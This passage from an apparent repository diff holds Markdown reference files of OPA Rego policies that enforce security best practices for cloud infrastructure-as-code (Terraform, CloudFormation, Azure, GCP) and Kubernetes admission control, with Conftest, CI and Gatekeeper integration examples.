msg := sprintf("RDS instance must have encryption enabled: %v", [resource.name])
}
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_db_instance"
resource.change.after.publicly_accessible == true
msg := sprintf("RDS instance cannot be publicly accessible: %v", [resource.name])
}
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_db_instance"
not resource.change.after.backup_retention_period
msg := sprintf("RDS instance must have backup retention configured: %v", [resource.name])
}
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_db_instance"
resource.change.after.backup_retention_period < 7
msg := sprintf("RDS instance must have at least 7 days backup retention: %v", [resource.name])
}
```
### IAM Policy Security
```rego
package terraform.aws.iam
# Deny wildcard actions in IAM policies
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_iam_policy"
# the policy attribute is a JSON-encoded string in the plan, so parse it first
policy_doc := json.unmarshal(resource.change.after.policy)
statement := policy_doc.Statement[_]
statement.Action[_] == "*"
msg := sprintf("IAM policy cannot use wildcard actions: %v", [resource.name])
}
# Deny wildcard resources
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_iam_policy"
policy_doc := json.unmarshal(resource.change.after.policy)
statement := policy_doc.Statement[_]
statement.Resource[_] == "*"
statement.Effect == "Allow"
msg := sprintf("IAM policy cannot use wildcard resources with Allow: %v", [resource.name])
}
# Deny policies without conditions for sensitive actions
sensitive_actions := [
"iam:CreateUser",
"iam:DeleteUser",
"iam:AttachUserPolicy",
"kms:Decrypt",
]
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_iam_policy"
policy_doc := json.unmarshal(resource.change.after.policy)
statement := policy_doc.Statement[_]
action := statement.Action[_]
sensitive_actions[_] == action
not statement.Condition
msg := sprintf("Sensitive IAM action requires conditions: %v in %v", [action, resource.name])
}
```
### Security Group Rules
```rego
package terraform.aws.security_groups
# Deny SSH from internet
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_security_group_rule"
resource.change.after.type == "ingress"
resource.change.after.from_port == 22
resource.change.after.to_port == 22
is_open_to_internet(resource.change.after.cidr_blocks)
msg := sprintf("Security group rule allows SSH from internet: %v", [resource.name])
}
# Deny RDP from internet
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_security_group_rule"
resource.change.after.type == "ingress"
resource.change.after.from_port == 3389
resource.change.after.to_port == 3389
is_open_to_internet(resource.change.after.cidr_blocks)
msg := sprintf("Security group rule allows RDP from internet: %v", [resource.name])
}
# Deny unrestricted ingress
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_security_group_rule"
resource.change.after.type == "ingress"
is_open_to_internet(resource.change.after.cidr_blocks)
not is_allowed_public_port(resource.change.after.from_port)
msg := sprintf("Security group rule allows unrestricted ingress: %v", [resource.name])
}
is_open_to_internet(cidr_blocks) {
cidr_blocks[_] == "0.0.0.0/0"
}
# Allowed public ports (HTTP/HTTPS)
is_allowed_public_port(port) {
port == 80
}
is_allowed_public_port(port) {
port == 443
}
```
### KMS Key Security
```rego
package terraform.aws.kms
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_kms_key"
not resource.change.after.enable_key_rotation
msg := sprintf("KMS key must have automatic rotation enabled: %v", [resource.name])
}
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_kms_key"
not resource.change.after.deletion_window_in_days
msg := sprintf("KMS key must have deletion window configured: %v", [resource.name])
}
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_kms_key"
resource.change.after.deletion_window_in_days < 30
msg := sprintf("KMS key deletion window must be at least 30 days: %v", [resource.name])
}
```
### CloudWatch Logging
```rego
package terraform.aws.logging
# Require CloudWatch logs for Lambda
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_lambda_function"
not has_cloudwatch_logs(resource.name)
msg := sprintf("Lambda function must have CloudWatch logs configured: %v", [resource.name])
}
has_cloudwatch_logs(function_name) {
resource := input.resource_changes[_]
resource.type == "aws_cloudwatch_log_group"
contains(resource.change.after.name, function_name)
}
```
## AWS CloudFormation
### S3 Bucket Security
```rego
package cloudformation.aws.s3
deny[msg] {
resource := input.Resources[name]
resource.Type == "AWS::S3::Bucket"
not has_bucket_encryption(resource)
msg := sprintf("S3 bucket must have encryption: %v", [name])
}
deny[msg] {
resource := input.Resources[name]
resource.Type == "AWS::S3::Bucket"
not has_versioning(resource)
msg := sprintf("S3 bucket must have versioning enabled: %v", [name])
}
has_bucket_encryption(resource) {
resource.Properties.BucketEncryption
}
has_versioning(resource) {
resource.Properties.VersioningConfiguration.Status == "Enabled"
}
```
### EC2 Security Groups
```rego
package cloudformation.aws.ec2
deny[msg] {
resource := input.Resources[name]
resource.Type == "AWS::EC2::SecurityGroup"
rule := resource.Properties.SecurityGroupIngress[_]
rule.CidrIp == "0.0.0.0/0"
rule.FromPort == 22
msg := sprintf("Security group allows SSH from internet: %v", [name])
}
deny[msg] {
resource := input.Resources[name]
resource.Type == "AWS::EC2::SecurityGroup"
rule := resource.Properties.SecurityGroupIngress[_]
rule.CidrIp == "0.0.0.0/0"
rule.FromPort == 3389
msg := sprintf("Security group allows RDP from internet: %v", [name])
}
```
### RDS Database
```rego
package cloudformation.aws.rds
deny[msg] {
resource := input.Resources[name]
resource.Type == "AWS::RDS::DBInstance"
not resource.Properties.StorageEncrypted
msg := sprintf("RDS instance must have encryption enabled: %v", [name])
}
deny[msg] {
resource := input.Resources[name]
resource.Type == "AWS::RDS::DBInstance"
resource.Properties.PubliclyAccessible == true
msg := sprintf("RDS instance cannot be publicly accessible: %v", [name])
}
```
## Azure ARM Templates
### Storage Account Security
```rego
package azure.storage
deny[msg] {
resource := input.resources[_]
resource.type == "Microsoft.Storage/storageAccounts"
not resource.properties.supportsHttpsTrafficOnly
msg := sprintf("Storage account must require HTTPS: %v", [resource.name])
}
deny[msg] {
resource := input.resources[_]
resource.type == "Microsoft.Storage/storageAccounts"
resource.properties.allowBlobPublicAccess == true
msg := sprintf("Storage account must disable public blob access: %v", [resource.name])
}
deny[msg] {
resource := input.resources[_]
resource.type == "Microsoft.Storage/storageAccounts"
not resource.properties.minimumTlsVersion == "TLS1_2"
msg := sprintf("Storage account must use TLS 1.2 minimum: %v", [resource.name])
}
```
### Virtual Machine Security
```rego
package azure.compute
deny[msg] {
resource := input.resources[_]
resource.type == "Microsoft.Compute/virtualMachines"
not has_managed_identity(resource)
msg := sprintf("Virtual machine should use managed identity: %v", [resource.name])
}
deny[msg] {
resource := input.resources[_]
resource.type == "Microsoft.Compute/virtualMachines"
not has_disk_encryption(resource)
msg := sprintf("Virtual machine must have disk encryption: %v", [resource.name])
}
has_managed_identity(vm) {
vm.identity.type
}
has_disk_encryption(vm) {
vm.properties.storageProfile.osDisk.encryptionSettings
}
```
### Network Security Groups
```rego
package azure.network
deny[msg] {
resource := input.resources[_]
resource.type == "Microsoft.Network/networkSecurityGroups"
rule := resource.properties.securityRules[_]
rule.properties.access == "Allow"
rule.properties.sourceAddressPrefix == "*"
rule.properties.destinationPortRange == "22"
msg := sprintf("NSG allows SSH from internet: %v", [resource.name])
}
deny[msg] {
resource := input.resources[_]
resource.type == "Microsoft.Network/networkSecurityGroups"
rule := resource.properties.securityRules[_]
rule.properties.access == "Allow"
rule.properties.sourceAddressPrefix == "*"
rule.properties.destinationPortRange == "3389"
msg := sprintf("NSG allows RDP from internet: %v", [resource.name])
}
```
## GCP Deployment Manager
### GCS Bucket Security
```rego
package gcp.storage
deny[msg] {
resource := input.resources[_]
resource.type == "storage.v1.bucket"
not has_uniform_access(resource)
msg := sprintf("GCS bucket must use uniform bucket-level access: %v", [resource.name])
}
deny[msg] {
resource := input.resources[_]
resource.type == "storage.v1.bucket"
not has_encryption(resource)
msg := sprintf("GCS bucket must have encryption configured: %v", [resource.name])
}
has_uniform_access(bucket) {
bucket.properties.iamConfiguration.uniformBucketLevelAccess.enabled == true
}
has_encryption(bucket) {
bucket.properties.encryption
}
```
### Compute Instance Security
```rego
package gcp.compute
deny[msg] {
resource := input.resources[_]
resource.type == "compute.v1.instance"
not has_service_account(resource)
msg := sprintf("Compute instance should use service account: %v", [resource.name])
}
deny[msg] {
resource := input.resources[_]
resource.type == "compute.v1.instance"
not has_disk_encryption(resource)
msg := sprintf("Compute instance must have disk encryption: %v", [resource.name])
}
has_service_account(instance) {
instance.properties.serviceAccounts
}
has_disk_encryption(instance) {
instance.properties.disks[_].diskEncryptionKey
}
```
### Firewall Rules
```rego
package gcp.network
deny[msg] {
resource := input.resources[_]
resource.type == "compute.v1.firewall"
resource.properties.direction == "INGRESS"
"0.0.0.0/0" == resource.properties.sourceRanges[_]
allowed := resource.properties.allowed[_]
allowed.ports[_] == "22"
msg := sprintf("Firewall rule allows SSH from internet: %v", [resource.name])
}
deny[msg] {
resource := input.resources[_]
resource.type == "compute.v1.firewall"
resource.properties.direction == "INGRESS"
"0.0.0.0/0" == resource.properties.sourceRanges[_]
allowed := resource.properties.allowed[_]
allowed.ports[_] == "3389"
msg := sprintf("Firewall rule allows RDP from internet: %v", [resource.name])
}
```
## Conftest Integration
Example using Conftest for Terraform validation:
```bash
# Install conftest
brew install conftest

# Create policy directory
mkdir -p policy

# Write policy to policy/terraform.rego
cat > policy/terraform.rego <<'EOF'
package main

deny[msg] {
    resource := input.resource_changes[_]
    resource.type == "aws_s3_bucket"
    not resource.change.after.server_side_encryption_configuration
    msg := sprintf("S3 bucket must have encryption: %v", [resource.name])
}
EOF

# Generate Terraform plan
terraform plan -out=tfplan.binary
terraform show -json tfplan.binary > tfplan.json

# Run conftest against the plan
conftest test tfplan.json
```
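Conftest also recognizes `warn` rules, which report findings without failing the run and are handy for advisory checks alongside hard `deny` rules. A minimal sketch, assuming the standard Terraform AWS provider `aws_db_instance` resource with its boolean `multi_az` attribute; the check itself is only illustrative:
```rego
package main

# Advisory finding: reported by conftest as a warning, does not fail the run
warn[msg] {
    resource := input.resource_changes[_]
    resource.type == "aws_db_instance"
    not resource.change.after.multi_az
    msg := sprintf("Consider enabling Multi-AZ for RDS instance: %v", [resource.name])
}
```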
## CI/CD Integration
### GitHub Actions
```yaml
name: IaC Policy Validation
on: [push, pull_request]

jobs:
  validate:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: Setup OPA
        uses: open-policy-agent/setup-opa@v2
      - name: Generate Terraform Plan
        run: |
          terraform init
          terraform plan -out=tfplan.binary
          terraform show -json tfplan.binary > tfplan.json
      - name: Validate with OPA
        run: |
          # --fail-defined makes the step fail whenever the query returns any violation
          opa eval --data policies/ --input tfplan.json \
            --format pretty --fail-defined 'data.terraform.deny[msg]'
```
### GitLab CI
```yaml
iac-validation:
  # Note: this job needs an image that provides terraform and a shell in addition to opa
  image: openpolicyagent/opa:latest
  script:
    - terraform init
    - terraform plan -out=tfplan.binary
    - terraform show -json tfplan.binary > tfplan.json
    # --fail-defined fails the job when any deny rule matches
    - opa eval --data policies/ --input tfplan.json --fail-defined 'data.terraform.deny[msg]'
  only:
    - merge_requests
```
## References
- [Conftest](https://www.conftest.dev/)
- [Terraform Sentinel](https://www.terraform.io/docs/cloud/sentinel/index.html)
- [AWS CloudFormation Guard](https://github.com/aws-cloudformation/cloudformation-guard)
- [Azure Policy](https://docs.microsoft.com/en-us/azure/governance/policy/)
- [Checkov](https://www.checkov.io/)

View File

@@ -0,0 +1,550 @@
# Kubernetes Security Policies
Comprehensive OPA policies for Kubernetes security best practices and admission control.
## Table of Contents
- [Pod Security](#pod-security)
- [RBAC Security](#rbac-security)
- [Network Security](#network-security)
- [Image Security](#image-security)
- [Secret Management](#secret-management)
## Pod Security
### Privileged Containers
Deny privileged containers:
```rego
package kubernetes.admission.privileged_containers
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
container.securityContext.privileged == true
msg := sprintf("Privileged container is not allowed: %v", [container.name])
}
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.initContainers[_]
container.securityContext.privileged == true
msg := sprintf("Privileged init container is not allowed: %v", [container.name])
}
```
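Admission policies like this one are straightforward to unit test by mocking the AdmissionReview payload. A minimal sketch, assuming the rules above live in a policy file and this test sits in the same package; run with `opa test .`:
```rego
package kubernetes.admission.privileged_containers

test_privileged_container_denied {
    deny[_] with input as {
        "request": {
            "kind": {"kind": "Pod"},
            "object": {"spec": {"containers": [{
                "name": "app",
                "securityContext": {"privileged": true}
            }]}}
        }
    }
}

test_unprivileged_container_allowed {
    count(deny) == 0 with input as {
        "request": {
            "kind": {"kind": "Pod"},
            "object": {"spec": {"containers": [{
                "name": "app",
                "securityContext": {"privileged": false}
            }]}}
        }
    }
}
```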
### Run as Non-Root
Enforce containers run as non-root:
```rego
package kubernetes.admission.non_root
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
not container.securityContext.runAsNonRoot
msg := sprintf("Container must run as non-root user: %v", [container.name])
}
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
container.securityContext.runAsUser == 0
msg := sprintf("Container cannot run as UID 0 (root): %v", [container.name])
}
```
### Read-Only Root Filesystem
Require read-only root filesystem:
```rego
package kubernetes.admission.readonly_root
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
not container.securityContext.readOnlyRootFilesystem
msg := sprintf("Container must use read-only root filesystem: %v", [container.name])
}
```
### Capabilities
Restrict Linux capabilities:
```rego
package kubernetes.admission.capabilities
# Capabilities that must never be added (Kubernetes lists them without the CAP_ prefix)
denied_capabilities := [
    "SYS_ADMIN",
    "NET_ADMIN",
    "SYS_PTRACE",
    "SYS_MODULE",
]
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
capability := container.securityContext.capabilities.add[_]
denied_capabilities[_] == capability
msg := sprintf("Capability %v is not allowed for container: %v", [capability, container.name])
}
# Require dropping ALL capabilities by default
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
not drops_all_capabilities(container)
msg := sprintf("Container must drop ALL capabilities: %v", [container.name])
}
drops_all_capabilities(container) {
container.securityContext.capabilities.drop[_] == "ALL"
}
```
### Host Namespaces
Prevent use of host namespaces:
```rego
package kubernetes.admission.host_namespaces
deny[msg] {
input.request.kind.kind == "Pod"
input.request.object.spec.hostPID == true
msg := "Sharing the host PID namespace is not allowed"
}
deny[msg] {
input.request.kind.kind == "Pod"
input.request.object.spec.hostIPC == true
msg := "Sharing the host IPC namespace is not allowed"
}
deny[msg] {
input.request.kind.kind == "Pod"
input.request.object.spec.hostNetwork == true
msg := "Sharing the host network namespace is not allowed"
}
```
### Host Paths
Restrict hostPath volumes:
```rego
package kubernetes.admission.host_path
# Allowed host paths (if any)
allowed_host_paths := [
"/var/log/pods", # Example: log collection
]
deny[msg] {
input.request.kind.kind == "Pod"
volume := input.request.object.spec.volumes[_]
volume.hostPath
not is_allowed_host_path(volume.hostPath.path)
msg := sprintf("hostPath volume is not allowed: %v", [volume.hostPath.path])
}
is_allowed_host_path(path) {
allowed_host_paths[_] == path
}
```
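The helper above only accepts exact matches, so a mount of a subdirectory such as `/var/log/pods/<pod-uid>` would still be denied. If subpaths of an allowed directory should be accepted, the helper can be replaced with a prefix-aware variant; the trailing slash keeps a sibling path like `/var/log/pods-evil` from matching:
```rego
package kubernetes.admission.host_path

# Replacement for is_allowed_host_path: exact match or subpath of an allowed directory
is_allowed_host_path(path) {
    allowed_host_paths[_] == path
}

is_allowed_host_path(path) {
    prefix := allowed_host_paths[_]
    startswith(path, concat("", [prefix, "/"]))
}
```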
### Security Context
Comprehensive pod security context validation:
```rego
package kubernetes.admission.security_context
deny[msg] {
input.request.kind.kind == "Pod"
not input.request.object.spec.securityContext
msg := "Pod must define a security context"
}
deny[msg] {
input.request.kind.kind == "Pod"
pod_security := input.request.object.spec.securityContext
not pod_security.runAsNonRoot
msg := "Pod security context must set runAsNonRoot: true"
}
deny[msg] {
input.request.kind.kind == "Pod"
pod_security := input.request.object.spec.securityContext
not pod_security.seccompProfile
msg := "Pod must define a seccomp profile"
}
```
## RBAC Security
### Wildcard Permissions
Prevent wildcard RBAC permissions:
```rego
package kubernetes.rbac.wildcards
deny[msg] {
input.request.kind.kind == "Role"
rule := input.request.object.rules[_]
rule.verbs[_] == "*"
msg := sprintf("Role contains wildcard verb permission in rule: %v", [rule])
}
deny[msg] {
input.request.kind.kind == "Role"
rule := input.request.object.rules[_]
rule.resources[_] == "*"
msg := sprintf("Role contains wildcard resource permission in rule: %v", [rule])
}
deny[msg] {
input.request.kind.kind == "ClusterRole"
rule := input.request.object.rules[_]
rule.verbs[_] == "*"
msg := sprintf("ClusterRole contains wildcard verb permission in rule: %v", [rule])
}
```
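The rules above cover wildcard verbs and resources on Roles but only wildcard verbs on ClusterRoles. A more compact variant closes that gap by iterating over both kinds and every wildcard-able field; this is a sketch rather than a drop-in replacement:
```rego
package kubernetes.rbac.wildcards

rbac_kinds := {"Role", "ClusterRole"}
wildcard_fields := {"verbs", "resources", "apiGroups"}

deny[msg] {
    rbac_kinds[input.request.kind.kind]
    rule := input.request.object.rules[_]
    field := wildcard_fields[_]
    rule[field][_] == "*"
    msg := sprintf("%v contains wildcard %v in rule: %v", [input.request.kind.kind, field, rule])
}
```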
### Cluster Admin
Restrict cluster-admin usage:
```rego
package kubernetes.rbac.cluster_admin
# System accounts allowed to use cluster-admin
allowed_system_accounts := [
"system:kube-controller-manager",
"system:kube-scheduler",
]
deny[msg] {
input.request.kind.kind == "ClusterRoleBinding"
input.request.object.roleRef.name == "cluster-admin"
subject := input.request.object.subjects[_]
not is_allowed_system_account(subject)
msg := sprintf("cluster-admin binding not allowed for subject: %v", [subject.name])
}
is_allowed_system_account(subject) {
allowed_system_accounts[_] == subject.name
}
```
### Service Account Token Mounting
Control service account token auto-mounting:
```rego
package kubernetes.rbac.service_account_tokens
deny[msg] {
input.request.kind.kind == "Pod"
input.request.object.spec.automountServiceAccountToken == true
not requires_service_account(input.request.object)
msg := "Pod should not auto-mount service account token unless required"
}
requires_service_account(pod) {
pod.metadata.annotations["requires-service-account"] == "true"
}
```
## Network Security
### Network Policies Required
Require network policies for namespaces:
```rego
package kubernetes.network.policies_required
# Check if namespace has network policies (requires admission controller data)
deny[msg] {
input.request.kind.kind == "Namespace"
not has_network_policy_annotation(input.request.object)
msg := sprintf("Namespace must have network policy annotation: %v", [input.request.object.metadata.name])
}
has_network_policy_annotation(namespace) {
namespace.metadata.annotations["network-policy.enabled"] == "true"
}
```
### Deny Default Network Policy
Implement default-deny network policy:
```rego
package kubernetes.network.default_deny
deny[msg] {
input.request.kind.kind == "NetworkPolicy"
not is_default_deny(input.request.object)
input.request.object.metadata.labels["policy-type"] == "default"
msg := "Default network policy must be deny-all"
}
is_default_deny(network_policy) {
# Check for empty ingress rules (deny all ingress)
not network_policy.spec.ingress
# Check for ingress type
network_policy.spec.policyTypes[_] == "Ingress"
}
```
### Service Type LoadBalancer
Restrict external LoadBalancer services:
```rego
package kubernetes.network.loadbalancer
deny[msg] {
input.request.kind.kind == "Service"
input.request.object.spec.type == "LoadBalancer"
not is_approved_for_external_exposure(input.request.object)
msg := sprintf("LoadBalancer service requires approval annotation: %v", [input.request.object.metadata.name])
}
is_approved_for_external_exposure(service) {
service.metadata.annotations["external-exposure.approved"] == "true"
}
```
## Image Security
### Image Registry Whitelist
Allow only approved image registries:
```rego
package kubernetes.images.registry_whitelist
approved_registries := [
"gcr.io/my-company",
"docker.io/my-company",
"quay.io/my-company",
]
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
not is_approved_registry(container.image)
msg := sprintf("Image from unapproved registry: %v", [container.image])
}
is_approved_registry(image) {
startswith(image, approved_registries[_])
}
```
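Because `startswith` matches bare string prefixes, an image such as `gcr.io/my-company-evil/app` would satisfy the `gcr.io/my-company` entry above. Where that matters, the helper can be replaced with a variant that anchors on the path separator:
```rego
package kubernetes.images.registry_whitelist

# Replacement for is_approved_registry: the approved prefix must be followed by "/"
is_approved_registry(image) {
    prefix := approved_registries[_]
    startswith(image, concat("", [prefix, "/"]))
}
```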
### Image Tags
Prevent latest tag and require specific tags:
```rego
package kubernetes.images.tags
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
endswith(container.image, ":latest")
msg := sprintf("Container uses 'latest' tag: %v", [container.name])
}
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
not contains(container.image, ":")
msg := sprintf("Container image must specify a tag: %v", [container.name])
}
```
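Images pinned by digest (`...@sha256:<hash>`) already satisfy the tag check above, since the digest reference contains a `:`. Teams that want stronger guarantees sometimes require digest pinning outright in sensitive namespaces. A sketch, where the `production` namespace name is only an example:
```rego
package kubernetes.images.tags

# Stricter, namespace-scoped variant: require immutable digest pinning
deny[msg] {
    input.request.kind.kind == "Pod"
    input.request.namespace == "production"
    container := input.request.object.spec.containers[_]
    not contains(container.image, "@sha256:")
    msg := sprintf("Production container image must be pinned by digest: %v", [container.name])
}
```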
### Image Vulnerability Scanning
Require vulnerability scan results:
```rego
package kubernetes.images.vulnerability_scanning
deny[msg] {
input.request.kind.kind == "Pod"
not has_scan_annotation(input.request.object)
msg := "Pod must have vulnerability scan results annotation"
}
deny[msg] {
input.request.kind.kind == "Pod"
scan_result := input.request.object.metadata.annotations["vulnerability-scan.result"]
scan_result == "failed"
msg := "Pod image failed vulnerability scan"
}
has_scan_annotation(pod) {
pod.metadata.annotations["vulnerability-scan.result"]
}
```
## Secret Management
### Environment Variable Secrets
Prevent secrets in environment variables:
```rego
package kubernetes.secrets.env_vars
sensitive_keywords := [
"password",
"token",
"apikey",
"secret",
"credential",
]
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
env := container.env[_]
is_sensitive_name(env.name)
env.value # Direct value, not from secret
msg := sprintf("Sensitive data in environment variable: %v in container %v", [env.name, container.name])
}
is_sensitive_name(name) {
lower_name := lower(name)
contains(lower_name, sensitive_keywords[_])
}
```
### Secret Volume Permissions
Restrict secret volume mount permissions:
```rego
package kubernetes.secrets.volume_permissions
deny[msg] {
input.request.kind.kind == "Pod"
volume := input.request.object.spec.volumes[_]
volume.secret
volume_mount := input.request.object.spec.containers[_].volumeMounts[_]
volume_mount.name == volume.name
not volume_mount.readOnly
msg := sprintf("Secret volume mount must be read-only: %v", [volume.name])
}
```
### External Secrets
Require use of external secret management:
```rego
package kubernetes.secrets.external
deny[msg] {
input.request.kind.kind == "Secret"
input.request.object.metadata.labels["environment"] == "production"
not input.request.object.metadata.annotations["external-secret.enabled"] == "true"
msg := sprintf("Production secrets must use external secret management: %v", [input.request.object.metadata.name])
}
```
## Admission Control Integration
Example OPA Gatekeeper ConstraintTemplate:
```yaml
apiVersion: templates.gatekeeper.sh/v1beta1
kind: ConstraintTemplate
metadata:
  name: k8spodsecsecurity
spec:
  crd:
    spec:
      names:
        kind: K8sPodSecSecurity
  targets:
    - target: admission.k8s.gatekeeper.sh
      rego: |
        package k8spodsecsecurity

        violation[{"msg": msg}] {
          container := input.review.object.spec.containers[_]
          container.securityContext.privileged == true
          msg := sprintf("Privileged container not allowed: %v", [container.name])
        }

        violation[{"msg": msg}] {
          container := input.review.object.spec.containers[_]
          not container.securityContext.runAsNonRoot
          msg := sprintf("Container must run as non-root: %v", [container.name])
        }
```
Example Constraint:
```yaml
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sPodSecSecurity
metadata:
  name: pod-security-policy
spec:
  match:
    kinds:
      - apiGroups: [""]
        kinds: ["Pod"]
    namespaces:
      - "production"
      - "staging"
```
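The embedded Rego can be pulled into a standalone file and unit tested with `opa test` before it is wrapped in the ConstraintTemplate (Gatekeeper's `gator` CLI offers suite-based testing as well). A minimal sketch of such a test, mocking the `input.review` object the template receives:
```rego
package k8spodsecsecurity

test_privileged_pod_violation {
    violation[_] with input as {
        "review": {"object": {"spec": {"containers": [{
            "name": "app",
            "securityContext": {"privileged": true, "runAsNonRoot": true}
        }]}}}
    }
}

test_compliant_pod_no_violation {
    count(violation) == 0 with input as {
        "review": {"object": {"spec": {"containers": [{
            "name": "app",
            "securityContext": {"privileged": false, "runAsNonRoot": true}
        }]}}}
    }
}
```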
## References
- [Kubernetes Pod Security Standards](https://kubernetes.io/docs/concepts/security/pod-security-standards/)
- [OPA Gatekeeper Library](https://github.com/open-policy-agent/gatekeeper-library)
- [NSA Kubernetes Hardening Guide](https://www.nsa.gov/Press-Room/News-Highlights/Article/Article/2716980/)
- [CIS Kubernetes Benchmark](https://www.cisecurity.org/benchmark/kubernetes)
